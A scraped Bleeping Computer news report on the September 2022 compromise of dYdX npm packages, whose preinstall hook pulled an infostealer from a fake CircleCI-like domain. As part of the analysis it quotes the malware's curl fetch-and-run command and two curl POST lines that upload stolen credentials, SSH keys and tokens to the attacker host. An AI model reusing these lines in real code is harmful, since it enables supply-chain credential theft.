# npm packages used by crypto exchanges compromised
## Multiple npm packages published by the crypto exchange, dYdX, and used by at least 44 cryptocurrency projects, appear to have been compromised. Powered by the Ethereum blockchain, dydX is a decentralized exchange platform offering perpetual trading options for over 35 popular cryptocurrencies including Bitcoin (BTC) and Ether (ETH).
## Information:

+ Link: https://www.bleepingcomputer.com/news/security/npm-packages-used-by-crypto-exchanges-compromised/
+ Source: Bleeping Computer
+ Author: Ax Sharma
+ Date published: 23 September 2022, 16:31
+ Date scraped: 23 September 2022, 17:01

## Article:
![Main article image](https://www.bleepstatic.com/content/hl-images/2022/07/05/NPM_logo_headpic.jpg)



Multiple npm packages published by the crypto exchange, dYdX, and used by at least 44 cryptocurrency projects appear to have been compromised.


Powered by the Ethereum blockchain, dydX is a decentralized exchange platform offering perpetual trading options for over 35 popular cryptocurrencies including Bitcoin (BTC) and Ether (ETH). At the time of writing, we observed the platform's average [daily trading volume was touching $1 billion](https://nomics.com/exchanges/dydx).


The packages in question were published from the npm account of a dYdX staff member and found to contain illicit code that would run info stealers on a system when installed.


## npm packages used by crypto exchange compromised


Security researcher [Maciej Mensfeld](https://twitter.com/maciejmensfeld) of software supply chain security firm Mend and creator of Diffend.io, reported coming across multiple npm packages that were compromised and covertly installing infostealers.


The packages in question, shown below, appear to have been published from the npm account of a dYdX crypto platform employee, BleepingComputer observed, although the exact cause of this compromise is yet to be determined:


1. [@dydxprotocol/solo](https://github.com/advisories/GHSA-xjr5-5w2w-3233) - versions 0.41.1, 0.41.2
2. [@dydxprotocol/perpetual](https://github.com/advisories/GHSA-42m8-vq85-5486) - versions 1.2.2, 1.2.3

An earlier advisory claimed that the package '@dydxprotocol/node-service-base-dev' was also affected but it has since been [withdrawn](https://github.com/advisories/GHSA-m4m8-qx26-rvpg).


BleepingComputer observed the compromised version 0.41.1 of 'solo' package was [still live on npm](https://www.npmjs.com/package/@dydxprotocol/solo) at the time of writing:



![compromised version of npm package solo](https://www.bleepstatic.com/images/news/u/1164866/2022/sep-2022/npm-dydx/npm-solo.jpg)**Compromised version of the npm package 'solo'** (BleepingComputer)


These packages make up the "Ethereum Smart Contracts and TypeScript library used for the dYdX Solo Trading Protocol."


The solo package, for example, is used by [at least 44 GitHub repositories](https://github.com/dydxprotocol/solo/network/dependents) belonging to multiple crypto platforms. GitHub READMEs for both 'solo' and 'perpetual' state these are being **"currently used by *trade.dydx.exchange*."**


## Fake 'Circle' CDN domain used to steal AWS IAM creds, SSH keys, GitHub tokens


Mensfeld shared the problematic piece of code injected in the manifest file of 'solo' package, for example.


As soon as the 'solo' package is installed, a *preinstall* script would trigger, downloading and running the contents of the *ci.js* JavaScript file hosted on *api.circle-cdn.com*.



![malicious line of code](https://www.bleepstatic.com/images/news/u/1164866/2022/sep-2022/npm-dydx/compromised-line.jpg)**Malicious line of code buried in manifest file package.json** (BleepingComputer)


Public domain records seen by BleepingComputer state "circle-cdn.com" was registered quite recently—on September 14th.


The domain name and the use of 'ci.js' in the malicious file name are likely attempts by the threat actor to imitate CircleCI, a software development CI/CD (continuous integration and continuous delivery) platform. By contrast, CircleCI's official API is hosted by Cloudflare and reachable on *circleci.com/api/v2/pipeline*.


"Looking at the [diff here](http://ttps://my.diffend.io/npm/@dydxprotocol/solo/0.41.0/0.41.1)... a *preinstall* was added," Mensfeld wrote in a [GitHub issue](https://github.com/dydxprotocol/solo/issues/521) alerting the dYdX community after having [no luck reaching the platform](https://twitter.com/maciejmensfeld/status/1573290966554972164).


"But this script contains a code that looks malicious.... It seems to be stealing credentials and other secrets," explained the researcher.


BleepingComputer observed that the *ci.js*script pulled by the compromised versions, as shown below, downloads and runs yet another Python script, *setup.py*


*curl http://api.circle-cdn.com/setup.py --output cisetup.py >> /dev/null 2>&1 && python3 cisetup.py && rm cisetup.py*
It is this 'setup.py' with the info-stealing code that exfiltrates the [IAM credentials](https://aws.amazon.com/iam/) from victim's Amazon AWS instance, among other secrets.


The 169.254.x.x IP address shown below, which the malicious code connects to is the result of a feature called Automatic Private IP Addressing (APIPA).


APIPA is invoked when a computer configured to obtain an automatic IP address via DHCP is [unable to do so from the DHCP server](https://answers.microsoft.com/en-us/windows/forum/all/cannot-get-rid-of-169254xxxx-ip-address/f485691e-4451-4079-9493-5c1ffbfc5ffa).


Docs published by Amazon AWS show how this IP address is relevant in the wider [IAM context](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html).



![infostealer exfiltrates IAM credentials](https://www.bleepstatic.com/images/news/u/1164866/2022/sep-2022/npm-dydx/info-stealer.jpg)Infostealer script setup.py exfiltrates IAM credentials **(BleepingComputer)**


Additionally, the code steals the user's GitHub tokens, SSH keys, environment variables, as well as the external IP address.


The stolen data is then uploaded to the same *api.circle-cdn.com* domain:


subprocess.getoutput("curl -X POST http://api.circle-cdn.com/uploader.php -F 'uploaded\_file=@" + filename2 + "' -F 'submit=Upload'")  

subprocess.getoutput('curl -X POST http://api.circle-cdn.com/api.php -d "textdata=' + allen + '"')
BleepingComputer observed the malicious code is strikingly identical to that seen in the past, involving the [malicious 'PyGrata' Python packages](https://www.bleepingcomputer.com/news/security/pypi-python-packages-caught-sending-stolen-aws-keys-to-unsecured-sites/) that also stole the victim's AWS credentials, environment variables, and SSH keys. 


dYdX chief architect Brendan Chou thanked Mensfeld for [promptly reporting](https://github.com/dydxprotocol/solo/issues/521#issuecomment-1256343838) the compromise and confirmed that "all [compromised versions] have been taken down except solo@0.41.1," attributing this to what appears to be "a temporary oversight" on npm's part.


BleepingComputer has reached out to dYdX via email and Twitter prior to publishing, to better understand the impact and scope of this compromise and we'll update this report as we hear back.


This incident follows last year's hijack of popular npm libraries '[ua-parser-js](https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/),' ['coa' and 'rc'](https://www.bleepingcomputer.com/news/security/popular-coa-npm-library-hijacked-to-steal-user-passwords/) which were laced with crypto miners and password stealers. Just weeks ago, PyPI packages were hijacked as the result of a [phishing campaign targeting developers](https://www.bleepingcomputer.com/news/security/pypi-packages-hijacked-after-developers-fall-for-phishing-emails/).


Threats to the software supply chain like these in recent times have prompted leading open source registries like npm and PyPI to [mandate two-factor authentication for maintainers](https://www.bleepingcomputer.com/news/security/pypi-mandates-2fa-for-critical-projects-developer-pushes-back/) responsible for the most widely used libraries.





## Tags:
***email-adresses***: exceptsolo@0.41.1
***urls***: http://api.circle-cdn.com/api.php http://api.circle-cdn.com/uploader.php http://api.circle-cdn.com/setup.py

### Autogenerated tags:
[[npm]] [[bleepingcomputer]] [[dydx]] [[github]] [[ip]] [[mensfeld]] [[aws]] [[iam]] [[ssh]] [[cisetup.py]]
